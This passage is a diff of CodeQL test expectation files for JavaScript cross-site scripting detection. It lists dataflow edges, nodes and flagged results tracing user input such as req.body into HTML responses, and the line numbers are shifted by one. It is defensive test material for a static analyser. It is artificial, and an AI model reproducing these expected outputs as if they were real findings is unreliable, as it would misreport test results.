" | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected index 9e842ab516ed..d4678176df1b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected @@ -1,41 +1,41 @@ edges -| ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | provenance | | -| ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | provenance | | -| ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:64:39:64:42 | file | provenance | | -| ReflectedXss.js:64:39:64:42 | file | ReflectedXss.js:65:16:65:19 | file | provenance | | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | ReflectedXss.js:68:12:68:52 | remark( ... tring() | provenance | | -| ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:41 | remark( ... q.body) | provenance | | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | ReflectedXss.js:72:12:72:65 | unified ... oString | provenance | | -| ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:56 | unified ... q.body) | provenance | | -| ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:74:34:74:34 | f | provenance | | -| ReflectedXss.js:74:34:74:34 | f | ReflectedXss.js:75:14:75:14 | f | provenance | | -| ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | provenance | | -| ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | provenance | | -| ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | provenance | | -| ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | provenance | | -| ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... q.body) | provenance | | -| ReflectedXss.js:114:11:114:41 | queryKeys | ReflectedXss.js:116:18:116:26 | queryKeys | provenance | | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:114:11:114:41 | queryKeys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:50:118:53 | keys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:58:118:61 | keys | provenance | | -| ReflectedXss.js:116:18:116:26 | queryKeys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray | ReflectedXss.js:119:25:119:32 | keyArray | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | ReflectedXss.js:119:25:119:32 | keyArray [0] | provenance | | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | ReflectedXss.js:118:11:118:61 | keyArray [0] | provenance | | -| ReflectedXss.js:118:50:118:53 | keys | ReflectedXss.js:118:49:118:54 | [keys] [0] | provenance | | -| ReflectedXss.js:118:58:118:61 | keys | ReflectedXss.js:118:11:118:61 | keyArray | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys | ReflectedXss.js:122:33:122:43 | invalidKeys | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | ReflectedXss.js:122:33:122:43 | invalidKeys [0] | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | ReflectedXss.js:119:11:119:72 | invalidKeys | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | ReflectedXss.js:119:11:119:72 | invalidKeys [0] | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys | ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | provenance | | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | provenance | | +| ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | provenance | | +| ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | provenance | | +| ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:63:39:63:42 | file | provenance | | +| ReflectedXss.js:63:39:63:42 | file | ReflectedXss.js:64:16:64:19 | file | provenance | | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | ReflectedXss.js:67:12:67:52 | remark( ... tring() | provenance | | +| ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:41 | remark( ... q.body) | provenance | | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | ReflectedXss.js:71:12:71:65 | unified ... oString | provenance | | +| ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:56 | unified ... q.body) | provenance | | +| ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:73:34:73:34 | f | provenance | | +| ReflectedXss.js:73:34:73:34 | f | ReflectedXss.js:74:14:74:14 | f | provenance | | +| ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | provenance | | +| ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | provenance | | +| ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | provenance | | +| ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... q.body) | provenance | | +| ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | provenance | | +| ReflectedXss.js:113:11:113:41 | queryKeys | ReflectedXss.js:115:18:115:26 | queryKeys | provenance | | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:113:11:113:41 | queryKeys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:50:117:53 | keys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:58:117:61 | keys | provenance | | +| ReflectedXss.js:115:18:115:26 | queryKeys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray | ReflectedXss.js:118:25:118:32 | keyArray | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | ReflectedXss.js:118:25:118:32 | keyArray [0] | provenance | | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | ReflectedXss.js:117:11:117:61 | keyArray [0] | provenance | | +| ReflectedXss.js:117:50:117:53 | keys | ReflectedXss.js:117:49:117:54 | [keys] [0] | provenance | | +| ReflectedXss.js:117:58:117:61 | keys | ReflectedXss.js:117:11:117:61 | keyArray | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys | ReflectedXss.js:121:33:121:43 | invalidKeys | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | ReflectedXss.js:121:33:121:43 | invalidKeys [0] | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | ReflectedXss.js:118:11:118:72 | invalidKeys | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | ReflectedXss.js:118:11:118:72 | invalidKeys [0] | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | provenance | | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | provenance | | @@ -144,63 +144,63 @@ edges | tst3.js:11:16:11:74 | prettie ... bel" }) | tst3.js:11:9:11:74 | code | provenance | | | tst3.js:11:32:11:39 | reg.body | tst3.js:11:16:11:74 | prettie ... bel" }) | provenance | | nodes -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:8:33:8:45 | req.params.id | semmle.label | req.params.id | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:17:31:17:39 | params.id | semmle.label | params.id | -| ReflectedXss.js:22:12:22:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | semmle.label | marked(req.body) | -| ReflectedXss.js:23:19:23:26 | req.body | semmle.label | req.body | -| ReflectedXss.js:29:12:29:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:41:12:41:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | semmle.label | convert ... q.body) | -| ReflectedXss.js:42:31:42:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:56:12:56:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:14:64:21 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:39:64:42 | file | semmle.label | file | -| ReflectedXss.js:65:16:65:19 | file | semmle.label | file | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | semmle.label | remark( ... tring() | -| ReflectedXss.js:68:33:68:40 | req.body | semmle.label | req.body | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | semmle.label | unified ... q.body) | -| ReflectedXss.js:72:12:72:65 | unified ... oString | semmle.label | unified ... oString | -| ReflectedXss.js:72:48:72:55 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:20:74:27 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:34:74:34 | f | semmle.label | f | -| ReflectedXss.js:75:14:75:14 | f | semmle.label | f | -| ReflectedXss.js:83:12:83:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | -| ReflectedXss.js:84:22:84:29 | req.body | semmle.label | req.body | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | -| ReflectedXss.js:85:23:85:30 | req.body | semmle.label | req.body | -| ReflectedXss.js:97:12:97:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:98:30:98:37 | req.body | semmle.label | req.body | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:100:31:100:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:103:76:103:83 | req.body | semmle.label | req.body | -| ReflectedXss.js:110:16:110:30 | request.query.p | semmle.label | request.query.p | -| ReflectedXss.js:114:11:114:41 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | semmle.label | keys: queryKeys | -| ReflectedXss.js:116:11:116:45 | keys | semmle.label | keys | -| ReflectedXss.js:116:18:116:26 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | -| ReflectedXss.js:118:11:118:61 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | semmle.label | [keys] [0] | -| ReflectedXss.js:118:50:118:53 | keys | semmle.label | keys | -| ReflectedXss.js:118:58:118:61 | keys | semmle.label | keys | -| ReflectedXss.js:119:11:119:72 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:119:25:119:32 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | -| ReflectedXss.js:122:33:122:43 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:7:33:7:45 | req.params.id | semmle.label | req.params.id | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:16:31:16:39 | params.id | semmle.label | params.id | +| ReflectedXss.js:21:12:21:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | semmle.label | marked(req.body) | +| ReflectedXss.js:22:19:22:26 | req.body | semmle.label | req.body | +| ReflectedXss.js:28:12:28:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:40:12:40:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | semmle.label | convert ... q.body) | +| ReflectedXss.js:41:31:41:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:55:12:55:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:14:63:21 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:39:63:42 | file | semmle.label | file | +| ReflectedXss.js:64:16:64:19 | file | semmle.label | file | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | semmle.label | remark( ... tring() | +| ReflectedXss.js:67:33:67:40 | req.body | semmle.label | req.body | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | semmle.label | unified ... q.body) | +| ReflectedXss.js:71:12:71:65 | unified ... oString | semmle.label | unified ... oString | +| ReflectedXss.js:71:48:71:55 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:20:73:27 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:34:73:34 | f | semmle.label | f | +| ReflectedXss.js:74:14:74:14 | f | semmle.label | f | +| ReflectedXss.js:82:12:82:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | +| ReflectedXss.js:83:22:83:29 | req.body | semmle.label | req.body | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | +| ReflectedXss.js:84:23:84:30 | req.body | semmle.label | req.body | +| ReflectedXss.js:96:12:96:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:97:30:97:37 | req.body | semmle.label | req.body | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:99:31:99:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:102:76:102:83 | req.body | semmle.label | req.body | +| ReflectedXss.js:109:16:109:30 | request.query.p | semmle.label | request.query.p | +| ReflectedXss.js:113:11:113:41 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | semmle.label | keys: queryKeys | +| ReflectedXss.js:115:11:115:45 | keys | semmle.label | keys | +| ReflectedXss.js:115:18:115:26 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | +| ReflectedXss.js:117:11:117:61 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | semmle.label | [keys] [0] | +| ReflectedXss.js:117:50:117:53 | keys | semmle.label | keys | +| ReflectedXss.js:117:58:117:61 | keys | semmle.label | keys | +| ReflectedXss.js:118:11:118:72 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:118:25:118:32 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | +| ReflectedXss.js:121:33:121:43 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... rams.id | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | semmle.label | req.params.id | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... rams.id | @@ -335,28 +335,28 @@ nodes subpaths | ReflectedXssGood3.js:139:24:139:26 | url | ReflectedXssGood3.js:68:22:68:26 | value | ReflectedXssGood3.js:108:10:108:23 | parts.join('') | ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | #select -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to a $@. | 